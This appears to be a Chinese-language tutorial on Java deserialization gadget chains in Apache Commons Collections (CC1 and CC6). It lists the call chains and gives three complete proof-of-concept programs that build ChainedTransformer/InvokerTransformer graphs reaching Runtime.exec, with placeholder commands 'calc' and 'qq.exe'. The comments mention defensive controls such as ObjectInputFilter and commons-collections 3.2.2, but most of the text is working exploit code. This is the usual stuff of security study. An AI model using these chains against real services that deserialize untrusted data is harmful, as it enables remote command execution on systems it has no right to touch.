
CommonsCollections3

一、CC1

1.1 链条

ObjectInputStream.readObject()
AnnotationInvocationHandler.readObject()
memberValues.entrySet()
...
ChainedTransformer.transform()
ConstantTransformer.transform()
InvokerTransformer.transform()
Method.invoke()
Class.getMethod()
InvokerTransformer.transform()
Method.invoke()
Runtime.getRuntime()
InvokerTransformer.transform()
Method.invoke()
Runtime.exec()

1.2 POC1


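/**
 * Local demonstration of the commons-collections "CC1" chain via {@code TransformedMap}.
 *
 * <p>The program builds an {@code AnnotationInvocationHandler} that wraps a
 * {@code TransformedMap}, writes it to {@code ser.bin} and reads it straight back.
 * Per the call chain listed on this page, the read side is what reaches
 * {@code ChainedTransformer.transform()}.
 *
 * <p>Defensive reading: the sink is {@code ObjectInputStream.readObject()} on bytes the
 * reader does not control. Services that must accept serialized Java objects should
 * install an allow-list {@code java.io.ObjectInputFilter} and run a commons-collections
 * release that refuses to deserialize {@code InvokerTransformer} by default (3.2.2 or
 * later in the 3.x line).
 *
 * <p>NOTE(review): this path relies on the pre-8u71 behaviour of
 * {@code AnnotationInvocationHandler.readObject()} - confirm the JDK used for the demo.
 */
public class CC101 {
    /** File the demo writes the serialized object to and reads it back from. */
    private static final String SER_FILE = "ser.bin";

    /**
     * Builds the object graph, serializes it and deserializes it again.
     *
     * @param args unused
     * @throws ClassNotFoundException if the handler class cannot be loaded or resolved on read
     * @throws NoSuchMethodException if the (Class, Map) constructor is not present
     * @throws InvocationTargetException if the reflective constructor call throws
     * @throws InstantiationException if the handler class cannot be instantiated
     * @throws IllegalAccessException if reflective access is denied
     * @throws IOException if {@code ser.bin} cannot be written or read
     */
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
        // Each transformer receives the previous one's result:
        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec("calc").
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        Map<Object, Object> hashMap = new HashMap<>();
        // The key matches the name of the single member of java.lang.annotation.Target.
        hashMap.put("value", "value");
        // No key transformer (null); the chain is installed as the value transformer.
        Map<Object, Object> transformedMap = TransformedMap.decorate(hashMap, null, chainedTransformer);

        // The handler class is not public, so it is reached by name and its
        // constructor is opened with setAccessible(true).
        Class<?> handlerClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> handlerConstructor = handlerClass.getDeclaredConstructor(Class.class, Map.class);
        handlerConstructor.setAccessible(true);
        Object o = handlerConstructor.newInstance(Target.class, transformedMap);

        serialize(o);
        unserialize(SER_FILE);
    }

    /**
     * Writes {@code object} to {@code ser.bin} with Java native serialization.
     *
     * @param object the object graph to serialize
     * @throws IOException if the file cannot be created or written
     */
    static void serialize(Object object) throws IOException {
        // try-with-resources closes the stream (and the file handle) even if
        // writeObject throws; the original left it open.
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(SER_FILE))) {
            oos.writeObject(object);
        }
    }

    /**
     * Reads one object back from {@code ser.bin} and discards it.
     *
     * <p>No {@code ObjectInputFilter} is set on the stream; that unfiltered
     * {@code readObject()} is the behaviour the demo exercises.
     *
     * @param object ignored; the file name is fixed to {@code ser.bin}
     * @throws IOException if the file cannot be opened or read
     * @throws ClassNotFoundException if a serialized class cannot be resolved
     */
    static void unserialize(Object object) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(SER_FILE))) {
            ois.readObject();
        }
    }
}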

1.3 POC2

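/**
 * Local demonstration of the commons-collections "CC1" chain via {@code LazyMap}
 * and a dynamic {@code Map} proxy.
 *
 * <p>An {@code AnnotationInvocationHandler} backed by a {@code LazyMap} serves as the
 * invocation handler of a {@code Map} proxy. That proxy is wrapped in a second
 * {@code AnnotationInvocationHandler}, which is serialized to {@code ser.bin} and
 * read straight back.
 *
 * <p>Defensive reading: the sink is an unfiltered {@code ObjectInputStream.readObject()}.
 * An allow-list {@code java.io.ObjectInputFilter} and a commons-collections release
 * that refuses to deserialize {@code InvokerTransformer} by default (3.2.2 or later in
 * the 3.x line) both close this path.
 *
 * <p>NOTE(review): like the {@code TransformedMap} variant, this relies on the
 * pre-8u71 {@code AnnotationInvocationHandler} - confirm the JDK used for the demo.
 */
public class CC1Poc2 {
    /** File the demo writes the serialized object to and reads it back from. */
    private static final String SER_FILE = "ser.bin";

    /**
     * Builds the object graph, serializes it and deserializes it again.
     *
     * @param args unused
     * @throws ClassNotFoundException if the handler class cannot be loaded or resolved on read
     * @throws NoSuchMethodException if the (Class, Map) constructor is not present
     * @throws InvocationTargetException if a reflective constructor call throws
     * @throws InstantiationException if the handler class cannot be instantiated
     * @throws IllegalAccessException if reflective access is denied
     * @throws IOException if {@code ser.bin} cannot be written or read
     */
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
        // Each transformer receives the previous one's result:
        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec("calc").
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        // The chain is installed as the LazyMap factory.
        Map<Object, Object> map = new HashMap<>();
        Map<Object, Object> lazyMap = LazyMap.decorate(map, chainedTransformer);

        // The handler class is not public, so it is reached by name and its
        // constructor is opened with setAccessible(true).
        Class<?> handlerClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> handlerConstructor = handlerClass.getDeclaredConstructor(Class.class, Map.class);
        handlerConstructor.setAccessible(true);
        InvocationHandler handler = (InvocationHandler) handlerConstructor.newInstance(Override.class, lazyMap);

        // Create a dynamic proxy for Map whose calls are routed to the handler above.
        Map<?, ?> mapProxy = (Map<?, ?>) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, handler);

        // Outer handler: this is the object that actually gets serialized.
        Object o = handlerConstructor.newInstance(Override.class, mapProxy);

        serialize(o);
        unserialize(SER_FILE);
    }

    /**
     * Writes {@code o} to {@code ser.bin} with Java native serialization.
     *
     * @param o the object graph to serialize
     * @throws IOException if the file cannot be created or written
     */
    static void serialize(Object o) throws IOException {
        // try-with-resources closes the stream (and the file handle) even if
        // writeObject throws; the original left it open.
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(SER_FILE))) {
            oos.writeObject(o);
        }
    }

    /**
     * Reads one object back from {@code ser.bin} and discards it.
     *
     * <p>No {@code ObjectInputFilter} is set on the stream; that unfiltered
     * {@code readObject()} is the behaviour the demo exercises.
     *
     * @param o ignored; the file name is fixed to {@code ser.bin}
     * @throws IOException if the file cannot be opened or read
     * @throws ClassNotFoundException if a serialized class cannot be resolved
     */
    static void unserialize(Object o) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(SER_FILE))) {
            ois.readObject();
        }
    }
}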

二、CC6

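该链不依赖 AnnotationInvocationHandler，因此不受 JDK 版本限制；但仍取决于 commons-collections 的版本：3.2.2 及之后的 3.x 版本默认禁止反序列化 InvokerTransformer 等类。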

2.1 链条

java.io.ObjectInputStream.readObject()
java.util.HashSet.readObject()
java.util.HashMap.put()
java.util.HashMap.hash()
org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
org.apache.commons.collections.map.LazyMap.get()
org.apache.commons.collections.functors.ChainedTransformer.transform()
org.apache.commons.collections.functors.InvokerTransformer.transform()
java.lang.reflect.Method.invoke()
java.lang.Runtime.exec()

2.2 POC

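/**
 * Local demonstration of the commons-collections "CC6" chain.
 *
 * <p>A {@code HashMap} whose key is a {@code TiedMapEntry} over a {@code LazyMap} is
 * serialized to {@code ser.bin} and read straight back. Per the call chain listed on
 * this page, hashing the key leads to {@code LazyMap.get()} and from there to the
 * map's factory transformer.
 *
 * <p>Defensive reading: the chain uses no JDK-internal class, so the JDK version does
 * not gate it. The controls that apply are an allow-list
 * {@code java.io.ObjectInputFilter} on the reading stream and a commons-collections
 * release that refuses to deserialize {@code InvokerTransformer} by default (3.2.2 or
 * later in the 3.x line).
 */
public class CC6Poc {
    /** File the demo writes the serialized object to and reads it back from. */
    private static final String SER_FILE = "ser.bin";

    /**
     * Builds the object graph, serializes it and deserializes it again.
     *
     * @param args unused
     * @throws IOException if {@code ser.bin} cannot be written or read
     * @throws ClassNotFoundException if a serialized class cannot be resolved on read
     * @throws NoSuchFieldException if {@code LazyMap} has no {@code factory} field
     * @throws IllegalAccessException if reflective access to the field is denied
     */
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        // Each transformer receives the previous one's result:
        // Runtime.class -> getMethod("getRuntime") -> invoke(null) -> exec("qq.exe").
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"qq.exe"})
        };
        ChainedTransformer transformer = new ChainedTransformer(transformers);

        // The LazyMap starts with a harmless constant factory. The put() below
        // hashes the key while the graph is still being built, and that must not
        // run the real chain.
        Map<Object, Object> hashMap = new HashMap<>();
        Map<Object, Object> lazyMap = LazyMap.decorate(hashMap, new ConstantTransformer(1));

        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "become");
        Map<Object, Object> hashMap1 = new HashMap<>();
        hashMap1.put(tiedMapEntry, "bbb");
        // Kept as published: asks the outer map to drop the String key "become".
        hashMap1.remove("become");

        // Swap the factory for the real chain only after the graph is built;
        // the field is not public, hence setAccessible(true).
        Field factoryField = LazyMap.class.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap, transformer);

        serialize(hashMap1);
        unserialize(SER_FILE);
    }

    /**
     * Writes {@code o} to {@code ser.bin} with Java native serialization.
     *
     * @param o the object graph to serialize
     * @throws IOException if the file cannot be created or written
     */
    static void serialize(Object o) throws IOException {
        // try-with-resources closes the stream (and the file handle) even if
        // writeObject throws; the original left it open.
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(SER_FILE))) {
            oos.writeObject(o);
        }
    }

    /**
     * Reads one object back from {@code ser.bin} and discards it.
     *
     * <p>No {@code ObjectInputFilter} is set on the stream; that unfiltered
     * {@code readObject()} is the behaviour the demo exercises.
     *
     * @param o ignored; the file name is fixed to {@code ser.bin}
     * @throws IOException if the file cannot be opened or read
     * @throws ClassNotFoundException if a serialized class cannot be resolved
     */
    static void unserialize(Object o) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(SER_FILE))) {
            ois.readObject();
        }
    }
}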
